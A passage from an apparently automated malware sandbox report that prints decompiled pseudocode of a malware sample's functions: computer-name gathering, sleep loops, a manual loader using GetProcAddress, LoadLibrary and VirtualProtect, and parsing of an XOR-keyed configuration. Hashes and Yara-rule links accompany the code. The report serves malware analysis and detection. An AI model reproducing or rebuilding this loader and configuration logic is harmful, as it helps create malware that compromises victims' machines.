				goto L5;
			}











                                                          0x005ea376
                                                          0x005ea376
                                                          0x005ea379
                                                          0x005ea37a
                                                          0x005ea384
                                                          0x005ea38b
                                                          0x005ea390
                                                          0x005ea392
                                                          0x005ea398
                                                          0x005ea3c0
                                                          0x005ea3d8
                                                          0x005ea3da
                                                          0x005ea3db
                                                          0x005ea3dd
                                                          0x005ea41b
                                                          0x005ea41b
                                                          0x005ea421
                                                          0x005ea427
                                                          0x005ea427
                                                          0x005ea3df
                                                          0x005ea3e5
                                                          0x005ea3e8
                                                          0x005ea3f7
                                                          0x005ea3f9
                                                          0x005ea400
                                                          0x005ea434
                                                          0x005ea439
                                                          0x005ea43b
                                                          0x005ea43d
                                                          0x005ea43d
                                                          0x00000000
                                                          0x005ea43b
                                                          0x005ea402
                                                          0x005ea407
                                                          0x005ea415
                                                          0x00000000
                                                          0x005ea415
                                                          0x005ea3cf
                                                          0x005ea3d4
                                                          0x005ea3d4
                                                          0x00000000
                                                          0x005ea3d4
                                                          0x005ea3a2
                                                          0x00000000
                                                          0x00000000
                                                          0x005ea3b1
                                                          0x00000000

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 005EA39A
                                                            • Part of subcall function 005E4AB6: GetTickCount.KERNEL32 ref: 005E4ACA
                                                            • Part of subcall function 005E4AB6: wsprintfA.USER32 ref: 005E4B1A
                                                            • Part of subcall function 005E4AB6: wsprintfA.USER32 ref: 005E4B37
                                                            • Part of subcall function 005E4AB6: wsprintfA.USER32 ref: 005E4B63
                                                            • Part of subcall function 005E4AB6: HeapFree.KERNEL32(00000000,?), ref: 005E4B75
                                                            • Part of subcall function 005E4AB6: wsprintfA.USER32 ref: 005E4B96
                                                            • Part of subcall function 005E4AB6: HeapFree.KERNEL32(00000000,?), ref: 005E4BA6
                                                            • Part of subcall function 005E4AB6: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 005E4BD4
                                                            • Part of subcall function 005E4AB6: GetTickCount.KERNEL32 ref: 005E4BE5
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 005EA3B8
                                                          • RtlFreeHeap.NTDLL(00000000,00000002,005E5289,?,005E5289,00000002,?,?,^]^,?), ref: 005EA415
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                          • String ID:
                                                          • API String ID: 1676223858-0
                                                          • Opcode ID: db7da8299ab94e7ba041335972916182212d283b7581548aad5d8cb1d747b8b5
                                                          • Instruction ID: 5c8a6c960d72656f24d3cebfa1a52520dfdabda7ab98ce2f8b188d2eb93442af
                                                          • Opcode Fuzzy Hash: db7da8299ab94e7ba041335972916182212d283b7581548aad5d8cb1d747b8b5
                                                          • Instruction Fuzzy Hash: BF218875200285EBCB19DF69DC89EAE3BBCFB98340F104425F941DB150D770E905AB72
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 10001E55, Relevance: 3.1, APIs: 2, Instructions: 59stringthreadCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E10001E55() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x10004144;
				if( *0x1000412c > 5) {
					_t16 = _t15 + 0x100050f9;
				} else {
					_t16 = _t15 + 0x100050b1;
				}
				E100016F1(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E1000132A( &_v32,  &_v16,  *0x10004140 ^ 0xfd7cd1cf) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x10004138);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E10001ADA(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x10004138 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E10002033(_t44, _t32 + 4);
						}
					}
					_t25 = E10001634(_v28); // executed
				}
				ExitThread(_t25);
			}















                                                          0x10001e5b
                                                          0x10001e6c
                                                          0x10001e76
                                                          0x10001e6e
                                                          0x10001e6e
                                                          0x10001e6e
                                                          0x10001e7d
                                                          0x10001e86
                                                          0x10001e8b
                                                          0x10001ea9
                                                          0x10001f05
                                                          0x10001eab
                                                          0x10001eb1
                                                          0x10001eb7
                                                          0x10001ec5
                                                          0x10001ec9
                                                          0x10001ed0
                                                          0x10001ed9
                                                          0x10001edd
                                                          0x10001ee3
                                                          0x10001ef4
                                                          0x10001ee5
                                                          0x10001eeb
                                                          0x10001eeb
                                                          0x10001ee3
                                                          0x10001efc
                                                          0x10001efc
                                                          0x10001f07

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: ExitThreadlstrlen
                                                          • String ID:
                                                          • API String ID: 2636182767-0
                                                          • Opcode ID: 116678ed17733bd9ed3f22f480b5e3fd2a9bdbacc699d8402b25238a8187df7b
                                                          • Instruction ID: ab8ed00748b6518aaca1cd8150c39477dba6cc77ca46683760519d6ad69b4fbf
                                                          • Opcode Fuzzy Hash: 116678ed17733bd9ed3f22f480b5e3fd2a9bdbacc699d8402b25238a8187df7b
                                                          • Instruction Fuzzy Hash: C4115B725082469BF711DB64CC89ECB77ECEB583C0F02082AF951D71A9EB30E6458B96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E58DB, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E005E58DB(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E005EA71F(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E005EA734(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                          0x005e58e0
                                                          0x005e58eb
                                                          0x005e58ed
                                                          0x005e58f3
                                                          0x005e58f5
                                                          0x005e58fa
                                                          0x005e5903
                                                          0x005e5907
                                                          0x005e5910
                                                          0x005e5914
                                                          0x005e5923
                                                          0x005e5916
                                                          0x005e5917
                                                          0x005e591c
                                                          0x005e591c
                                                          0x005e5914
                                                          0x005e5907
                                                          0x005e592c

                                                          APIs
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,005E1FA0,74B5F710,00000000,?,?,005E1FA0), ref: 005E58F3
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,005E1FA0,005E1FA1,?,?,005E1FA0), ref: 005E5910
                                                            • Part of subcall function 005EA734: HeapFree.KERNEL32(00000000,00000000,005E5637,00000000,?,?,00000000), ref: 005EA740
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ComputerHeapName$AllocateFree
                                                          • String ID:
                                                          • API String ID: 187446995-0
                                                          • Opcode ID: c35273bf93510ad57aebd0ef8224d4b5ff06bd64899e81d8eeb0d5dc76db7721
                                                          • Instruction ID: 8cfd5cedf334d13921fb8676d9e6f8e8d620bd18bddd84d08abb910897aa6908
                                                          • Opcode Fuzzy Hash: c35273bf93510ad57aebd0ef8224d4b5ff06bd64899e81d8eeb0d5dc76db7721
                                                          • Instruction Fuzzy Hash: C4F0902A600286EAEB15D7AA9C05EAF2AFCEBC4714F210059A540E3101EA70EE01D660
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E4ECA, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x5ed23c) == 0) {
						E005E1B42();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x5ed23c) == 1) {
						_t10 = E005E12E5(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                          0x005e4ed1
                                                          0x005e4ed2
                                                          0x005e4ed5
                                                          0x005e4f07
                                                          0x005e4f09
                                                          0x005e4f09
                                                          0x005e4ed7
                                                          0x005e4ed8
                                                          0x005e4eed
                                                          0x005e4ef4
                                                          0x005e4ef6
                                                          0x005e4ef6
                                                          0x005e4ef4
                                                          0x005e4ed8
                                                          0x005e4f11

                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(005ED23C), ref: 005E4EDF
                                                            • Part of subcall function 005E12E5: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,005E4EF2,?), ref: 005E12F8
                                                          • InterlockedDecrement.KERNEL32(005ED23C), ref: 005E4EFF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Interlocked$CreateDecrementHeapIncrement
                                                          • String ID:
                                                          • API String ID: 3834848776-0
                                                          • Opcode ID: ec2bd8841c8d946748ba89f88dd5d24fc0ac58c67d035c6c47379aa7c7d9ca11
                                                          • Instruction ID: 5a0a4fcd8b7e5f560252f7115c66061a3efde2fdc614dbc53564d1205f1fb079
                                                          • Opcode Fuzzy Hash: ec2bd8841c8d946748ba89f88dd5d24fc0ac58c67d035c6c47379aa7c7d9ca11
                                                          • Instruction Fuzzy Hash: C3E086352081F693972D1FB79D5DB7EAE56BF90F80F024424F9D1D5150D620CC41AAA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 100016F1, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E100016F1(void* __eax, intOrPtr _a4) {

				 *0x10004150 =  *0x10004150 & 0x00000000;
				_push(0);
				_push(0x1000414c);
				_push(1);
				_push(_a4);
				 *0x10004148 = 0xc; // executed
				L10001A3E(); // executed
				return __eax;
			}



                                                          0x100016f1
                                                          0x100016f8
                                                          0x100016fa
                                                          0x100016ff
                                                          0x10001701
                                                          0x10001705
                                                          0x1000170f
                                                          0x10001714

                                                          APIs
                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(10001E82,00000001,1000414C,00000000), ref: 1000170F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: DescriptorSecurity$ConvertString
                                                          • String ID:
                                                          • API String ID: 3907675253-0
                                                          • Opcode ID: c61367c42b0475a435da7ef8647a919691ac96a9d7cf21db5be20c61e91521ee
                                                          • Instruction ID: c754c69a99eee57bc17a19cef26cf4e48c55fe35ecd49d9a529ee64d39f5317a
                                                          • Opcode Fuzzy Hash: c61367c42b0475a435da7ef8647a919691ac96a9d7cf21db5be20c61e91521ee
                                                          • Instruction Fuzzy Hash: 5AC04CF8241350A6F620DF408C85FC57A51B7A5785F124504F214251D9CBB51094851D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 10001634, Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 86%
                                                          			E10001634(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x10004140;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x10004140 - 0x63698bc4 &  !( *0x10004140 - 0x63698bc4);
				_t18 = E10001146( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x10004140 - 0x63698bc4 &  !( *0x10004140 - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x10004140 - 0x63698bc4 &  !( *0x10004140 - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E10001CBE(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E10001BAC(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E10001020(_t44, _t40);
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E1000201E(_t42);
					L8:
					return _t29;
				}
			}














                                                          0x1000163c
                                                          0x1000163e
                                                          0x1000165a
                                                          0x1000166b
                                                          0x10001672
                                                          0x100016d0
                                                          0x00000000
                                                          0x10001674
                                                          0x10001674
                                                          0x1000167e
                                                          0x10001682
                                                          0x10001687
                                                          0x1000168a
                                                          0x1000168f
                                                          0x10001693
                                                          0x10001698
                                                          0x1000169d
                                                          0x100016a1
                                                          0x100016a6
                                                          0x100016a7
                                                          0x100016ab
                                                          0x100016b0
                                                          0x100016b8
                                                          0x100016b8
                                                          0x100016b0
                                                          0x100016a1
                                                          0x10001693
                                                          0x100016ba
                                                          0x100016c3
                                                          0x100016c7
                                                          0x100016d1
                                                          0x100016d7
                                                          0x100016d7

                                                          APIs
                                                            • Part of subcall function 10001146: GetModuleHandleA.KERNEL32(?,00000020), ref: 1000116A
                                                            • Part of subcall function 10001146: GetProcAddress.KERNEL32(00000000,?), ref: 1000118C
                                                            • Part of subcall function 10001146: GetProcAddress.KERNEL32(00000000,?), ref: 100011A2
                                                            • Part of subcall function 10001146: GetProcAddress.KERNEL32(00000000,?), ref: 100011B8
                                                            • Part of subcall function 10001146: GetProcAddress.KERNEL32(00000000,?), ref: 100011CE
                                                            • Part of subcall function 10001146: GetProcAddress.KERNEL32(00000000,?), ref: 100011E4
                                                            • Part of subcall function 10001CBE: memcpy.NTDLL(?,?,?,?,?,?,?,?,1000167E,?), ref: 10001CF5
                                                            • Part of subcall function 10001CBE: memcpy.NTDLL(?,?,?), ref: 10001D2A
                                                            • Part of subcall function 10001BAC: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 10001BE4
                                                            • Part of subcall function 10001020: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 10001059
                                                            • Part of subcall function 10001020: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 100010CE
                                                            • Part of subcall function 10001020: GetLastError.KERNEL32 ref: 100010D4
                                                          • GetLastError.KERNEL32 ref: 100016B2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                          • String ID:
                                                          • API String ID: 2673762927-0
                                                          • Opcode ID: 128863c4b96fdd5e0b5520693e17a9650446fa3d9ad2d900b697df63d12b79e3
                                                          • Instruction ID: 2910a6364c5bb3ba5c3e70b9206c46a00ef4e134a19efb6f23cc70e8801df8ba
                                                          • Opcode Fuzzy Hash: 128863c4b96fdd5e0b5520693e17a9650446fa3d9ad2d900b697df63d12b79e3
                                                          • Instruction Fuzzy Hash: 3311087A7003126BE721DBA98CC0DDF77BCEF882847054128F901D7649EBA1ED0687A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E1AE2, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
                                                          			E005E1AE2(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                                                          0x005e1ae2
                                                          0x005e1aef
                                                          0x005e1af0
                                                          0x005e1af1
                                                          0x005e1af8
                                                          0x005e1b26
                                                          0x005e1b27
                                                          0x005e1b2a
                                                          0x005e1b30
                                                          0x00000000
                                                          0x00000000
                                                          0x005e1b0f
                                                          0x005e1b19
                                                          0x005e1b20
                                                          0x00000000
                                                          0x005e1b11
                                                          0x005e1b14
                                                          0x005e1b34
                                                          0x005e1b16
                                                          0x005e1b16
                                                          0x00000000
                                                          0x005e1b16
                                                          0x005e1b14
                                                          0x005e1b3b
                                                          0x005e1b41
                                                          0x005e1b41
                                                          0x00000000

                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 005E1B2A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: d40a0301c6a721493995a688e75de626dc268f546505ab4cc2a05e38d8295d7c
                                                          • Instruction ID: dae0f02355729548bbd1ac613e5def194874e836744cd615b38dd780eeee8556
                                                          • Opcode Fuzzy Hash: d40a0301c6a721493995a688e75de626dc268f546505ab4cc2a05e38d8295d7c
                                                          • Instruction Fuzzy Hash: 05F03775D01258EFCB08DB95C988AEDBBBCFF04304F1084AAE542A7200E7B46B84DF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 005E888E, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 237memoryCOMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 95%
                                                          			E005E888E(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				signed int _t58;
				intOrPtr _t61;
				signed int _t62;
				signed int _t67;
				void* _t69;
				void* _t70;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				signed int _t84;
				signed int _t88;
				signed int _t92;
				void* _t97;
				intOrPtr _t114;

				_t98 = __ecx;
				_t26 =  *0x5ed2a4; // 0x63699bc3
				_t1 =  &_v12; // 0x5e5d25
				if(E005E7145( &_v8, _t1, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x90) {
					 *0x5ed2d8 = _v8;
				}
				_t31 =  *0x5ed2a4; // 0x63699bc3
				_t5 =  &_v12; // 0x5e5d25
				if(E005E7145( &_v16, _t5, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L62:
					_t25 =  &_v12; // 0x5e5d25
					return  *_t25;
				}
				_t37 =  *0x5ed2a4; // 0x63699bc3
				_t8 =  &_v12; // 0x5e5d25
				if(E005E7145(_t8,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L60:
					HeapFree( *0x5ed238, 0, _v16);
					goto L62;
				} else {
					_t9 =  &_v12; // 0x5e5d25
					_t97 =  *_t9;
					if(_t97 == 0) {
						_t43 = 0;
					} else {
						_t92 =  *0x5ed2a4; // 0x63699bc3
						_t43 = E005E6B2E(_t98, _t97, _t92 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0x5ed240 = _v8;
						}
					}
					if(_t97 == 0) {
						_t44 = 0;
					} else {
						_t88 =  *0x5ed2a4; // 0x63699bc3
						_t44 = E005E6B2E(_t98, _t97, _t88 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0x5ed244 = _v8;
						}
					}
					if(_t97 == 0) {
						_t45 = 0;
					} else {
						_t84 =  *0x5ed2a4; // 0x63699bc3
						_t45 = E005E6B2E(_t98, _t97, _t84 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x5ed248 = _v8;
						}
					}
					if(_t97 == 0) {
						_t46 = 0;
					} else {
						_t80 =  *0x5ed2a4; // 0x63699bc3
						_t46 = E005E6B2E(_t98, _t97, _t80 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x5ed004 = _v8;
						}
					}
					if(_t97 == 0) {
						_t47 = 0;
					} else {
						_t76 =  *0x5ed2a4; // 0x63699bc3
						_t47 = E005E6B2E(_t98, _t97, _t76 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x5ed02c = _v8;
						}
					}
					if(_t97 == 0) {
						_t48 = 0;
					} else {
						_t72 =  *0x5ed2a4; // 0x63699bc3
						_t48 = E005E6B2E(_t98, _t97, _t72 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t69 = 0x10;
						_t70 = E005E56FA(_t69);
						if(_t70 != 0) {
							_push(_t70);
							E005E6702();
						}
					}
					if(_t97 == 0) {
						_t49 = 0;
					} else {
						_t67 =  *0x5ed2a4; // 0x63699bc3
						_t49 = E005E6B2E(_t98, _t97, _t67 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E005E56FA(0, _t49) != 0) {
						_t114 =  *0x5ed32c; // 0x16695b0
						E005E23F4(_t114 + 4, _t65);
					}
					if(_t97 == 0) {
						_t50 = 0;
					} else {
						_t62 =  *0x5ed2a4; // 0x63699bc3
						_t50 = E005E6B2E(_t98, _t97, _t62 ^ 0x372ab5b7);
					}
					if(_t50 == 0) {
						L52:
						_t51 =  *0x5ed2a8; // 0x107a5a8
						_t20 = _t51 + 0x5ee252; // 0x616d692f
						 *0x5ed2d4 = _t20;
						goto L53;
					} else {
						_t61 = E005E56FA(0, _t50);
						 *0x5ed2d4 = _t61;
						if(_t61 != 0) {
							L53:
							if(_t97 == 0) {
								_t53 = 0;
							} else {
								_t58 =  *0x5ed2a4; // 0x63699bc3
								_t53 = E005E6B2E(_t98, _t97, _t58 ^ 0xd8dc5cde);
							}
							if(_t53 == 0) {
								_t54 =  *0x5ed2a8; // 0x107a5a8
								_t21 = _t54 + 0x5ee791; // 0x6976612e
								_t55 = _t21;
							} else {
								_t55 = E005E56FA(0, _t53);
							}
							 *0x5ed340 = _t55;
							HeapFree( *0x5ed238, 0, _t97);
							_v12 = 0;
							goto L60;
						}
						goto L52;
					}
				}
			}




































                                                          0x005e888e
                                                          0x005e8891
                                                          0x005e88a2
                                                          0x005e88b1
                                                          0x005e88bf
                                                          0x005e88bf
                                                          0x005e88c4
                                                          0x005e88cf
                                                          0x005e88de
                                                          0x005e8b0d
                                                          0x005e8b14
                                                          0x005e8b14
                                                          0x005e8b1b
                                                          0x005e8b1b
                                                          0x005e88e4
                                                          0x005e88f3
                                                          0x005e8900
                                                          0x005e8afb
                                                          0x005e8b05
                                                          0x00000000
                                                          0x005e8906
                                                          0x005e8906
                                                          0x005e8906
                                                          0x005e890b
                                                          0x005e8921
                                                          0x005e890d
                                                          0x005e890d
                                                          0x005e891a
                                                          0x005e891a
                                                          0x005e892b
                                                          0x005e892d
                                                          0x005e8937
                                                          0x005e893c
                                                          0x005e893c
                                                          0x005e8937
                                                          0x005e8943
                                                          0x005e8959
                                                          0x005e8945
                                                          0x005e8945
                                                          0x005e8952
                                                          0x005e8952
                                                          0x005e895d
                                                          0x005e895f
                                                          0x005e8969
                                                          0x005e896e
                                                          0x005e896e
                                                          0x005e8969
                                                          0x005e8975
                                                          0x005e898b
                                                          0x005e8977
                                                          0x005e8977
                                                          0x005e8984
                                                          0x005e8984
                                                          0x005e898f
                                                          0x005e8991
                                                          0x005e899b
                                                          0x005e89a0
                                                          0x005e89a0
                                                          0x005e899b
                                                          0x005e89a7
                                                          0x005e89bd
                                                          0x005e89a9
                                                          0x005e89a9
                                                          0x005e89b6
                                                          0x005e89b6
                                                          0x005e89c1
                                                          0x005e89c3
                                                          0x005e89cd
                                                          0x005e89d2
                                                          0x005e89d2
                                                          0x005e89cd
                                                          0x005e89d9
                                                          0x005e89ef
                                                          0x005e89db
                                                          0x005e89db
                                                          0x005e89e8
                                                          0x005e89e8
                                                          0x005e89f3
                                                          0x005e89f5
                                                          0x005e89ff
                                                          0x005e8a04
                                                          0x005e8a04
                                                          0x005e89ff
                                                          0x005e8a0b
                                                          0x005e8a21
                                                          0x005e8a0d
                                                          0x005e8a0d
                                                          0x005e8a1a
                                                          0x005e8a1a
                                                          0x005e8a25
                                                          0x005e8a27
                                                          0x005e8a2a
                                                          0x005e8a2b
                                                          0x005e8a32
                                                          0x005e8a34
                                                          0x005e8a35
                                                          0x005e8a35
                                                          0x005e8a32
                                                          0x005e8a3c
                                                          0x005e8a52
                                                          0x005e8a3e
                                                          0x005e8a3e
                                                          0x005e8a4b
                                                          0x005e8a4b
                                                          0x005e8a56
                                                          0x005e8a64
                                                          0x005e8a6e
                                                          0x005e8a6e
                                                          0x005e8a75
                                                          0x005e8a8b
                                                          0x005e8a77
                                                          0x005e8a77
                                                          0x005e8a84
                                                          0x005e8a84
                                                          0x005e8a8f
                                                          0x005e8aa2
                                                          0x005e8aa2
                                                          0x005e8aa7
                                                          0x005e8aad
                                                          0x00000000
                                                          0x005e8a91
                                                          0x005e8a94
                                                          0x005e8a99
                                                          0x005e8aa0
                                                          0x005e8ab2
                                                          0x005e8ab4
                                                          0x005e8aca
                                                          0x005e8ab6
                                                          0x005e8ab6
                                                          0x005e8ac3
                                                          0x005e8ac3
                                                          0x005e8ace
                                                          0x005e8ada
                                                          0x005e8adf
                                                          0x005e8adf
                                                          0x005e8ad0
                                                          0x005e8ad3
                                                          0x005e8ad3
                                                          0x005e8aed
                                                          0x005e8af2
                                                          0x005e8af8
                                                          0x00000000
                                                          0x005e8af8
                                                          0x00000000
                                                          0x005e8aa0
                                                          0x005e8a8f

                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,%]^,?,63699BC3,?,%]^,63699BC3,?,%]^,63699BC3,00000005,005ED00C,00000008), ref: 005E8933
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,%]^,?,63699BC3,?,%]^,63699BC3,?,%]^,63699BC3,00000005,005ED00C,00000008), ref: 005E8965
